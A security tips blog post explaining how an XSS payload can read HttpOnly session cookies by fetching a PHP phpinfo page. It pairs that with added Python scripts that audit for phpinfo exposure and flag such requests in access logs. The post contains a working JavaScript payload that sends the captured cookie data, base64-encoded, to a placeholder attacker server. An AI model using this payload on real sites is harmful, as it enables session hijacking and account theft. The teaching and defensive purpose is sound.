# Week 8 - Stealing HttpOnly Cookies from PHPINFO

## Steal HttpOnly Cookies Through PHPINFO

Have you ever been (\*legally) hacking a web application and found the session cookie to be marked as ‘HttpOnly’? Well, with a little bit of luck and some JavaScript, you can still access a user’s session! In week 8 of the Website Hacking Tips + Tricks series, I’ll be showing you how.

HttpOnly is a flag included in the Set-Cookie HTTP response header. It tells the browser not to expose the cookie to client-side JavaScript, so a Cross-Site Scripting payload cannot read a user’s session from `document.cookie` :/ The browser still attaches the cookie to every request it sends to the site, though, and that is what the rest of this tip relies on.

However, many PHP applications include a PHPINFO file (a script that calls `phpinfo()`, often left at `phpinfo.php`) containing information regarding the site’s configuration. Most importantly, the PHPINFO output echoes the raw `Cookie` request header under the name `HTTP_COOKIE`, so it lists EVERY cookie the browser sent for the user’s current session, even the ones marked as ‘HttpOnly’.

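From the defender’s side the fix is twofold: make sure no `phpinfo()` caller is reachable in production, and disable the function outright in php.ini with `disable_functions = phpinfo`, so that a forgotten file prints nothing even if it is found. The Python script below is an added example, not code from the original post. It walks a webroot for PHP files that call `phpinfo()`, parses the effective `disable_functions` directive from php.ini text, and reports whether the cookie leak described above is possible. The webroot built by `build_sample_webroot()` and the two php.ini fragments are constructed for illustration; point `audit()` at your real document root and php.ini contents instead.

```python
"""Audit a PHP deployment for phpinfo() exposure.

Added example (not from the original post). The sample webroot and the two
php.ini fragments below are constructed for illustration only.
"""
import os
import re
import tempfile

# A call to phpinfo(), case-insensitive, tolerating whitespace before the paren.
PHPINFO_CALL = re.compile(r"\bphpinfo\s*\(", re.IGNORECASE)
# Extensions the web server typically hands to the PHP interpreter.
PHP_EXTENSIONS = (".php", ".phtml", ".php5", ".inc")

SAMPLE_INI_WEAK = """\
; constructed php.ini fragment: phpinfo() left enabled
expose_php = On
disable_functions =
"""

SAMPLE_INI_HARDENED = """\
; constructed php.ini fragment: phpinfo() disabled
expose_php = Off
disable_functions = phpinfo,exec,shell_exec ; inline comment
"""


def find_phpinfo_files(webroot):
    """Return webroot-relative paths of PHP files that call phpinfo()."""
    hits = []
    for dirpath, _dirs, files in os.walk(webroot):
        for name in files:
            if not name.lower().endswith(PHP_EXTENSIONS):
                continue  # text/asset files cannot execute phpinfo()
            path = os.path.join(dirpath, name)
            try:
                with open(path, "r", encoding="utf-8", errors="replace") as fh:
                    if PHPINFO_CALL.search(fh.read()):
                        hits.append(os.path.relpath(path, webroot))
            except OSError:
                continue  # unreadable file: skip it, keep walking
    return sorted(hits)


def disabled_functions(ini_text):
    """Parse the effective disable_functions list from php.ini text.

    A later directive overrides an earlier one, as PHP itself behaves;
    lines starting with ';' and anything after ';' on a line are comments.
    """
    disabled = set()
    for line in ini_text.splitlines():
        line = line.strip()
        if not line or line.startswith(";"):
            continue
        key, sep, value = line.partition("=")
        if sep and key.strip().lower() == "disable_functions":
            value = value.split(";", 1)[0].strip().strip('"')
            disabled = {f.strip().lower() for f in value.split(",") if f.strip()}
    return disabled


def audit(webroot, ini_text):
    """Combine both checks into a verdict usable as a CI or deploy gate."""
    files = find_phpinfo_files(webroot)
    disabled = "phpinfo" in disabled_functions(ini_text)
    return {
        "phpinfo_files": files,
        "phpinfo_disabled": disabled,
        # Cookies can only leak if a caller exists AND the function still runs.
        "cookie_leak_possible": bool(files) and not disabled,
    }


def build_sample_webroot():
    """Create a throwaway webroot of constructed files and return its path."""
    root = tempfile.mkdtemp(prefix="webroot-")
    os.makedirs(os.path.join(root, "tools"))
    samples = {
        "index.php": "<?php echo 'hello'; ?>",
        "phpinfo.php": "<?php phpinfo(); ?>",
        os.path.join("tools", "info.php"): "<?php\n  PHPINFO ();\n",
        "notes.txt": "phpinfo( is mentioned here but this file is not PHP",
    }
    for rel, body in samples.items():
        with open(os.path.join(root, rel), "w", encoding="utf-8") as fh:
            fh.write(body)
    return root


if __name__ == "__main__":
    root = build_sample_webroot()
    for label, ini in (("weak", SAMPLE_INI_WEAK), ("hardened", SAMPLE_INI_HARDENED)):
        print(label, audit(root, ini))
```

The audit deliberately treats `disable_functions` as the backstop rather than the fix: the finding to act on is every file it lists, because a reachable phpinfo page also discloses paths, loaded extensions and environment variables even when the cookie line is the most damaging part.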
We can create a Cross-Site Scripting payload that requests the PHPINFO page from the user’s browser, retrieves the response body, and sends it to our server. Then we can view the cookies and gain access to the user’s session! This can be accomplished with the below JavaScript:

```html
<script>
// Request the PHPINFO page from the user's browser; the browser attaches
// the session cookies (HttpOnly included) to this same-origin request.
var req = new XMLHttpRequest();
req.onload = reqListener;
var url = '<target-url>/phpinfo.php';
req.withCredentials = true;
req.open('GET', url, false);
req.send();

// Once the response arrives, take the output from the HTTP_COOKIE entry
// onward and send it, base64-encoded, to the callback server.
function reqListener() {
  var req2 = new XMLHttpRequest();
  const sess = this.responseText.substring(this.responseText.indexOf('HTTP_COOKIE') + 1);
  req2.open('GET', '<attacker-server>/?data=' + btoa(sess), false);
  req2.send();
}
</script>
```

All you need to specify is the URL containing the PHPINFO file (`<target-url>`), and the server listening for a callback (`<attacker-server>`). Note that the browser only lets a script read the response to a request on its own origin, so the payload has to execute on the same origin that serves the PHPINFO file.
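For detection, the request pattern this payload produces is worth logging: a script-initiated `GET` for the PHPINFO page that returns 200, rather than an administrator opening the page in a tab. The Python script below is an added example, not part of the original post. It assumes an access-log format that extends the combined format with one extra quoted field holding the request’s `Sec-Fetch-Dest` header (modern browsers send `empty` for an XMLHttpRequest or `fetch()` call and `document` for a page opened directly), which the web server has to be configured to log; the log lines are constructed samples.

```python
"""Flag phpinfo exposure in web-server access logs.

Added example, not from the original post. Assumed log format: the "combined"
format with one extra quoted field appended that carries the request's
Sec-Fetch-Dest header ("-" when the client sent none). Sample lines are
constructed.
"""
import re

SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0" "document"
203.0.113.5 - - [10/Oct/2023:13:55:41 +0000] "GET /phpinfo.php HTTP/1.1" 200 88213 "https://shop.example/account" "Mozilla/5.0" "empty"
198.51.100.7 - - [10/Oct/2023:13:57:02 +0000] "GET /phpinfo.php HTTP/1.1" 200 88213 "-" "Mozilla/5.0" "document"
198.51.100.9 - - [10/Oct/2023:13:58:10 +0000] "GET /info.php?x=1 HTTP/1.1" 404 312 "-" "curl/8.0" "-"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)" "(?P<dest>[^"]*)"$'
)

# Common names for a phpinfo() page; extend to match your own deployment.
PHPINFO_PATH = re.compile(r"(phpinfo|/info\.php$)", re.IGNORECASE)


def parse_line(line):
    """Return the named fields of one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify(entry):
    """Return a severity for one parsed entry, or None if it is not of interest.

    A dest of "-" means the client sent no Sec-Fetch-Dest (older browser or a
    CLI tool); it is treated as unknown, not benign, so a 200 still scores.
    """
    path = entry["path"].split("?", 1)[0]  # ignore the query string
    if not PHPINFO_PATH.search(path):
        return None
    if entry["status"] != "200":
        return "low"       # someone looked for the file but did not get it
    if entry["dest"] == "empty":
        return "high"      # 200 to a script-initiated fetch: the XSS pattern
    return "medium"        # phpinfo reachable at all in production is a finding


def detect(log_text):
    """Run classify() over every line and collect the findings in log order."""
    findings = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        severity = classify(entry)
        if severity:
            findings.append({"ip": entry["ip"], "path": entry["path"],
                             "status": entry["status"], "dest": entry["dest"],
                             "severity": severity})
    return findings


if __name__ == "__main__":
    for f in detect(SAMPLE_LOG):
        print(f"{f['severity']:6} {f['ip']:15} {f['status']} {f['path']} "
              f"(Sec-Fetch-Dest={f['dest']})")
```

The "medium" hits are the ones to fix first, since any 200 from a phpinfo page in production means the exposure exists regardless of who fetched it; the "high" hit is the one to treat as an incident, because a browser fetching that page from a script while carrying a logged-in user’s cookies is exactly the sequence shown above.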

![](/files/nsS09mPARmMxTccO2X1t)

![](/files/Onuo4s1acXWRjWf4rDWg)

![SRC: https://aleksikistauri.medium.com/bypassing-httponly-with-phpinfo-file-4e5a8b17129b](/files/NAZxOHLjYrT4kpqcliT8)

